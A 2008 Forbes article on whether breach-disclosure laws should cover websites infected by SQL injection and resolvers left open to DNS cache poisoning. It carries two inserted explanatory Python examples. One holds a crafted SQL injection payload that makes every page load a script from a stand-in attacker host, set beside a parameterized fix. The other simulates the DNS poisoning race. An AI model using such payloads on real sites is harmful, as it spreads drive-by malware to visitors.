Channelnewsasia.com
Sunday, November 23, 2008
Technology Features
Dangerous Cybersilence
Andy Greenberg, Forbes.com
Posted: 22 August 2008 1632 hrs
Sometimes no news is worse than bad news.

When a company's data is stolen by hackers, affected customers typically receive a disturbing note from the breached firm, warning that they could soon become victims of identity theft.

But last May, when Chinese hackers infected more than 500,000 Web sites with malicious software designed to steal personal information, visitors to those sites received something more disturbing: an invisible password-stealing program on their machines, and an eerie silence from the owners of the sites they'd visited.

Today, 44 U.S. states have passed breach disclosure laws that require companies whose cache of personal information is lost or stolen to publicize the incident, reporting the problem to the affected customers. But those laws haven't kept pace with the evolution of cybercrime.

Increasingly common cybercriminal exploits, particularly those that occur on the Web, still don't have to be reported under any disclosure law even after a company discovers the attack on its site. And that lack of any warning, according to some cybersecurity experts, means that unwitting Web users need new legal protections.

The owners of hacked sites should be held responsible for their visitors' exposed data, just as hacked companies are held responsible for customer accounts, argues Alan Paller, director of the SANS Institute, a security training organization. "The end result is the same: You caused me to lose my data," he says. "If you know your site was infected, don't you have an ethical responsibility to provide a warning? Shouldn't we change the rules so that the guy with a sexually transmitted disease has to say he's infecting people?"

In fact, the Web's epidemic of malware infections is only growing. According to a study by Google researchers last February, more than 3 million out of 60 million pages analyzed were found to perform "drive-by downloads," invisibly installing malicious software on users' machines. About 1.3% of Google searches turned up at least one of those malicious pages, triple the percentage from eight months earlier.

The potential for exploitation is even bigger. According to security firm White Hat Security, 16% of all Web pages are vulnerable to so-called "SQL injection," the tactic used by the Chinese hackers whose attack swept the Web in May. In that attack, a crafted request reached each site's database query and rewrote stored page content to carry a script tag, so that every page served afterward silently loaded the attackers' password-stealing software onto visitors' machines.
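The following is an added example, not code from the article or from any of the attacked sites. It models the class of flaw just described on an in-memory SQLite database with constructed sample pages: a page-view handler that splices a visitor-supplied Referer header into an UPDATE statement, beside the same handler with a bound parameter. The attacker host, the payload and the schema are assumptions made for the illustration. The `infected_pages()` check at the end is what a site owner would need to run to learn that the content they serve has been tampered with.

```python
"""Added example (not from the article or the attacked sites): the class of
SQL injection behind the 2008 mass site infections, modelled on an
in-memory SQLite database with constructed sample data.

The vulnerable handler splices a visitor-supplied Referer header into an
UPDATE statement. One crafted header rewrites the body of every stored
page to append a <script> tag, so each later visitor loads the attacker's
script (a drive-by download). The hardened handler binds the value as a
parameter instead."""
import sqlite3

# Assumed attacker host; the real 2008 payloads pointed at attacker-run servers.
INJECTED_TAG = '<script src="http://malware.example/ld.js"></script>'

# Constructed malicious Referer: closes the string literal, adds a second
# SET clause that touches every row, and comments out the original WHERE.
ATTACK_REFERER = "', body = body || '" + INJECTED_TAG + "' WHERE 1=1 --"


def make_db():
    """Fresh database holding two constructed pages."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE news ("
        "id INTEGER PRIMARY KEY, body TEXT NOT NULL, "
        "hits INTEGER NOT NULL DEFAULT 0, referer TEXT NOT NULL DEFAULT '')"
    )
    db.executemany("INSERT INTO news (body) VALUES (?)",
                   [("<p>Hello</p>",), ("<p>World</p>",)])
    db.commit()
    return db


def record_view_vulnerable(db, page_id, referer):
    """BAD: untrusted input concatenated into the SQL text."""
    sql = ("UPDATE news SET hits = hits + 1, referer = '" + referer +
           "' WHERE id = " + str(page_id))
    db.execute(sql)
    db.commit()


def record_view_safe(db, page_id, referer):
    """GOOD: the same statement with bound parameters; the driver passes the
    Referer as data, so it can never change the statement's structure."""
    db.execute("UPDATE news SET hits = hits + 1, referer = ? WHERE id = ?",
               (referer, page_id))
    db.commit()


def page_row(db, page_id):
    """(hits, referer, body) for one page."""
    return db.execute("SELECT hits, referer, body FROM news WHERE id = ?",
                      (page_id,)).fetchone()


def infected_pages(db):
    """IDs of pages whose stored body now carries a script tag: the check a
    site owner should run, and the fact a disclosure notice would report."""
    rows = db.execute(
        "SELECT id FROM news WHERE body LIKE '%<script%' ORDER BY id")
    return [r[0] for r in rows]


if __name__ == "__main__":
    victim = make_db()
    record_view_vulnerable(victim, 1, ATTACK_REFERER)
    print("vulnerable site, infected pages:", infected_pages(victim))  # [1, 2]
    hardened = make_db()
    record_view_safe(hardened, 1, ATTACK_REFERER)
    print("hardened site, infected pages:", infected_pages(hardened))  # []
```

Note that a single visit to a single page is enough to rewrite every page in the table, which is why the same tens of thousands of sites could be reinfected in bulk; the bound-parameter version stores the hostile header verbatim as data and leaves the page bodies untouched.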

Contacting every visitor to a Web site is nearly impossible. But an amended breach disclosure law might require sites to post a notice on a site itself, warning users that it had been compromised over a certain period of time. That kind of heads-up could be a cheap and effective way to create accountability among the thousands of site owners who leave their pages vulnerable to malware attacks, says Paul Stevens, policy director of the Privacy Rights Clearinghouse.

"This is so simple and easy," he says. "If this were to prevent one breach of someone's private data, the good would have outweighed the expense."

Even if publicizing Web-based malware attacks wouldn't actively prevent identity theft, it might shame site owners into patching their vulnerabilities, suggests SANS Web security researcher Johannes Ullrich.

"The real problem is that no one is fixing their sites," says Ullrich. "The same tens of thousands of sites get infected over and over with different malware using the same methods. A few class action lawsuits could be a good incentive to fix this."

The Web's security disclosure issues go beyond the growing wave of malware infections. In July, security researcher Dan Kaminsky revealed a flaw in the Web's domain name system, or DNS, the protocol that maps a Web site's name to the numeric address of the server that hosts it. By poisoning the cached answers held by DNS servers, hackers could invisibly redirect users to look-alike sites designed to steal banking passwords or other sensitive information.

When Kaminsky announced the existence of that flaw in DNS on July 8, it took Internet service providers including AT&T, Time Warner Cable, Cablevision and EarthLink more than 10 days to install a patch protecting their customers.

Even after exploits taking advantage of the flaw became public in late July, several service providers left their customers vulnerable to invisible redirections for days. None were required to inform their customers of the vulnerability or even of recorded attacks.
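The following added example is my own simplified model of the race described in the paragraphs above; it is not code from Kaminsky, IOActive or any of the providers named. The mechanism it models (a 16-bit transaction ID, a source port that most unpatched resolvers kept fixed, and a patch that randomised that port) comes from the public advisory on the flaw, not from this article, and it goes beyond the text by showing the patched case side by side with the unpatched one. The port space, the fixed port number, the addresses and the assumption that the attacker can send one spoofed reply per transaction ID before the real answer lands are all assumptions noted in the code.

```python
"""Added example, not from the article: a simplified model of the DNS
cache-poisoning race that the July 2008 Kaminsky advisory concerned.

A resolver tags each outgoing query with a random 16-bit transaction ID
and sends it from a UDP source port, then accepts the first reply whose
source port and transaction ID match an outstanding query. Before the
patch most resolvers used one fixed port, so an attacker who could make
the resolver issue queries and could spoof replies only had to guess the
16-bit ID; the patch added roughly 16 more bits by randomising the port.
Assumptions in this model: a 16-bit port space (real ephemeral ranges are
smaller), port 53 as the unpatched resolver's constant source port, and an
attacker fast enough to send a reply for every transaction ID before the
real answer arrives (querying fresh subdomains gives unlimited retries, so
this is the steady-state outcome)."""
import random

TXID_BITS = 16
PORT_BITS = 16          # assumption, see module docstring
FIXED_PORT = 53         # assumption: the unpatched resolver's constant source port
ATTACKER_IP = "203.0.113.66"   # documentation address standing in for the look-alike site
REAL_IP = "192.0.2.10"          # documentation address for the genuine site


class Resolver:
    """Caching resolver that validates replies only by (port, txid)."""

    def __init__(self, rng, randomize_port):
        self.rng = rng
        self.randomize_port = randomize_port
        self.pending = {}   # (port, txid) -> name awaiting an answer
        self.cache = {}     # name -> answer

    def send_query(self, name):
        port = self.rng.getrandbits(PORT_BITS) if self.randomize_port else FIXED_PORT
        txid = self.rng.getrandbits(TXID_BITS)
        self.pending[(port, txid)] = name

    def receive(self, port, txid, name, answer):
        """Accept a reply iff it matches an outstanding query; True if cached."""
        if self.pending.get((port, txid)) != name:
            return False          # no matching query: dropped
        del self.pending[(port, txid)]
        self.cache[name] = answer
        return True

    def deliver_legitimate(self, name, answer):
        """The real authoritative answer arrives after the attacker's flood."""
        for (port, txid), pending_name in list(self.pending.items()):
            if pending_name == name:
                self.receive(port, txid, name, answer)


def poison_attempts(randomize_port, queries, seed=2008):
    """Run `queries` poisoning attempts; return how many cache entries the
    attacker ends up controlling."""
    resolver = Resolver(random.Random(seed), randomize_port)
    attacker = random.Random(seed + 1)
    for i in range(queries):
        name = f"www{i}.bank.example"    # constructed: one fresh name per attempt
        resolver.send_query(name)
        # The attacker knows the port if it is fixed, otherwise must guess it
        # too, and floods one spoofed reply per possible transaction ID.
        port_guess = FIXED_PORT if not randomize_port else attacker.getrandbits(PORT_BITS)
        for txid in range(1 << TXID_BITS):
            if resolver.receive(port_guess, txid, name, ATTACKER_IP):
                break
        resolver.deliver_legitimate(name, REAL_IP)   # too late if already poisoned
    return sum(1 for answer in resolver.cache.values() if answer == ATTACKER_IP)


if __name__ == "__main__":
    print("fixed source port, poisoned:", poison_attempts(False, 8), "of 8")
    print("random source port, poisoned:", poison_attempts(True, 8), "of 8")
```

With the port fixed, every attempt succeeds, because enumerating the transaction ID is the whole search; with the port randomised the attacker's flood almost always lands on the wrong port and the genuine answer is the one cached. That gap is why the ten days the providers above took to deploy the patch mattered.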

Still, Kaminsky, a researcher for security firm IOActive, is ambivalent about the potential for expanded disclosure requirements. "Practically everyone had a vulnerable [DNS] server," he says. "Should hundreds of millions of disclosure messages have gone out? We don't want to create unnecessary noise or panic, or distract from the messages that really matter."

At the same time, Kaminsky says, companies need to provide more information about their security issues--if not to potential victims of identity theft, then to the security industry itself. "We can't manage what we can't measure," he says. "We have a real problem with hard data in our industry, and we need a kind of statistical clearinghouse."

Traditional data breaches, Kaminsky points out, are just beginning to achieve that sort of transparency. Since the passing of disclosure laws beginning in California in 2003, reports have outlined the source of breaches in much greater detail, revealing, for instance, that a large proportion of breaches are caused by lost laptops and that the fraction of data theft by company employees has doubled over the last year.

If companies could be convinced--or required--to share their troubles caused by new threats, the results could lead to similarly surprising conclusions, Kaminsky hopes.

"Whether disclosure laws should be updated, I'm really not sure," he says. "But more data is always a good thing."
